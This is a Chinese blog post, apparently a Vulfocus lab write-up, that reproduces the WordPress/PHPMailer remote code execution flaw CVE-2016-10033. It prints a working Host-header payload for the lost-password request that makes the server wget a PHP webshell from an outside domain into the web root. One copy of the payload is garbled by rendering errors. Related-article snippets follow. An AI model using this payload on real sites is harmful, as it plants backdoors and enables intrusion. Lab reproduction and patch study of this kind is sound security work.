[Vulfocus解题系列] WordPress远程命令执行(CVE-2016-10033)

最新推荐文章于 2024-04-17 11:31:22 发布
最新推荐文章于 2024-04-17 11:31:22 发布
阅读量2.1k 收藏 7
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118556796
版权

漏洞介绍

名称: wordpress 远程代码执行 (CVE-2016-10033)

描述: WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。

影响版本

WordPress <= 4.7.1

PHPMailer < 5.2.18

解题过程

1.打开靶场
在这里插入图片描述
2.进入登录页面
在这里插入图片描述
3.点击忘记密码,进入重置页面
在这里插入图片描述
4.使用burp抓包
在这里插入图片描述

5.构建pyalod,意思是在cuihui.00yongshiwangzi.cn/one.txt 下载one.txt文件,将内容写入shell.php中,其中one.txt里面写的是php一句话木马。

aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /var/www/html/shell.php cuihui.00yongshiwangzi.cn/one.txt}} null)

按照以下规则替换一下:

空格 —> KaTeX parse error: Expected '}', got 'EOF' at end of input: {substr{10}{1}{tod_log}}
/ —> KaTeX parse error: Expected '}', got 'EOF' at end of input: {substr{0}{1}{spool_directory}}

aa(any -froot@localhost -be KaTeX parse error: Expected '}', got 'EOF' at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}--output-docum…{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}var{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}www{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}html{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}shell.php{substr{10}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 8: tod_log}̲}cuihui.00yongs…{substr{0}{1}{KaTeX parse error: Expected 'EOF', got '}' at position 16: spool_directory}̲}zk{substr{0}{1}{$spool_directory}}one.txt}} null)

7.将构建好的pyalod写入Host中,post包如下:

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}shell.php${substr{10}{1}{$tod_log}}cuihui.00yongshiwangzi.cn${substr{0}{1}{$spool_directory}}one.txt}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

8.说明命令被成功执行在这里插入图片描述
9.使用蚁剑连接,在根目录获得flag
在这里插入图片描述

修复建议

更新wordpress、phpmailer到最新版本

00勇士王子
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
WordPress远程命令执行
harker_20的博客
11-15 1017
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://mp.csdn.net/mdeditor/103079416 漏洞信息 漏洞编号:CVE-2016-10033 漏洞简述:WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,...
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4701
WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。 漏洞版本: WordPress &lt;= 4.6.0 PH...
wordpress 命令执行CVE-2016-10033)复现
YouthBelief的博客
11-04 1993
wordpress 远程命令执行CVE-2018-15877) wordpress 远程命令执行CVE-2018-15877)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 wordpress 远程命令执行CVE-2018-15877) WordPressWordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。 0x01 漏洞描述 Plainview Activity Monitor plugin是使用
Vulfocus-WordPress远程命令执行(CVE-2016-10033)
qq_52178795的博客
06-11 587
漏洞名称:WordPress远程命令执行(CVE-2016-10033)漏洞描述:WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。当WordPress 使用 PHPMailer 组件向用户发送邮件。
WordPress social-warfare插件XSS和RCE漏洞【CVE-2019-9978】
最新发布
XZ_______的博客
04-17 513
在一个宁静的小镇上,小牛是一位资深的网络安全专家。他深知,网络安全不仅仅是防止黑客攻击,更重要的是提前进行信息收集和分析,以便更好地了解潜在的威胁。有一天,李明接到了一家大型企业的邀请,希望他能协助进行一次全面的网络安全评估。李明欣然接受了这个挑战,并立即开始了准备工作。他首先通过搜索引擎和社交媒体平台,搜集了关于这家企业的各种信息。他仔细阅读了公司的官方网站、新闻报道、员工评论等,以了解企业的业务规模、组织架构、技术架构以及可能存在的安全漏洞。
vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033
weixin_42884199的博客
12-06 369
一、启动靶机 docker-compose build docker-compose up -d 访问URL进行install: http://192.168.150.146:8080 二、生成payload 前提:命令中 空格 用 ${substr{10}{1}{$tod_log}}代替 / 用 ${substr{0}{1}{$spool_directory}}代替 命令: /usr/bin/wget --output-document /tmp/rce vps_ip/a.txt payload:
漏洞复现 wordpress 远程代码执行CVE-2016-10033
weixin_48900801的博客
07-25 1220
漏洞复现 wordpress 远程代码执行CVE-2016-10033) 名称: WordPressWordpress基金会的一套使用PHP语言开发的博客平台。WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3308
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行
WordPress 远程命令执行漏洞
weixin_47493074的博客
10-01 471
WordPress 远程命令执行漏洞
WordPress 3.5.1远程代码执行EXP
weixin_34174132的博客
03-08 357
瞌睡龙 · 2013/12/12 14:02from:Remote Code Execution exploit in WordPress 3.5.1(ps:老外也有几分标题党的意思,虽然是wordpress本身留下的坑,但是目前的利用还是需要安装的插件踩到了这个坑,才会被利用成功,并且要进入后台……感谢horseluke帮忙测试并翻译EXP与总结部分。)0x00 背景之前,在vagosec.or...
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
include_voidmain的博客
06-02 1175
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
WordPress-Mailpress远程代码执行漏洞——利用
zjnuwsf的博客
05-12 4410
相关资料: http://www.jeeseen.com/archives/421.html http://www.xingkonglangzi.com/post-662.html https://www.exehack.net/3509.html https://github.com/Medicean/VulApps/tree/master/w/wordpress/2
WordPress 远程执行代码漏洞 CVE-2016-10033 漏洞复现
ADummy的博客
03-02 900
WordPress 4.6远程执行代码漏洞(PwnScriptum) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>远程代码执行 0x01漏洞介绍 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能执行命令,而在1.920处没有限制。 ​ 影响版本 Webmin < 1.920 0x02漏洞复现 ​ 访问http://your-ip:8080/,设置管理员用户名和密码以使用它(数据库已配置且不会自
Log4j2远程代码执行-vulfocus-wp
miojjnum的博客
12-22 270
描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境:(
CVE-2016-10033
08-30
CVE-2016-10033是PHPMailer中存在的高危漏洞。这个漏洞是由于class.phpmailer.php文件没有正确处理用户的请求导致的。攻击者只需要巧妙地构造出一个恶意邮箱地址,就可以写入任意文件,从而造成远程命令执行的危害。 这个漏洞可以被利用的方法有多种,比如直接使用漏洞利用脚本进行攻击、使用Docker搭建复现环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CVE漏洞复现-CVE-2016-10033-远程命令执行](https://blog.csdn.net/qq_64973687/article/details/130424237)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值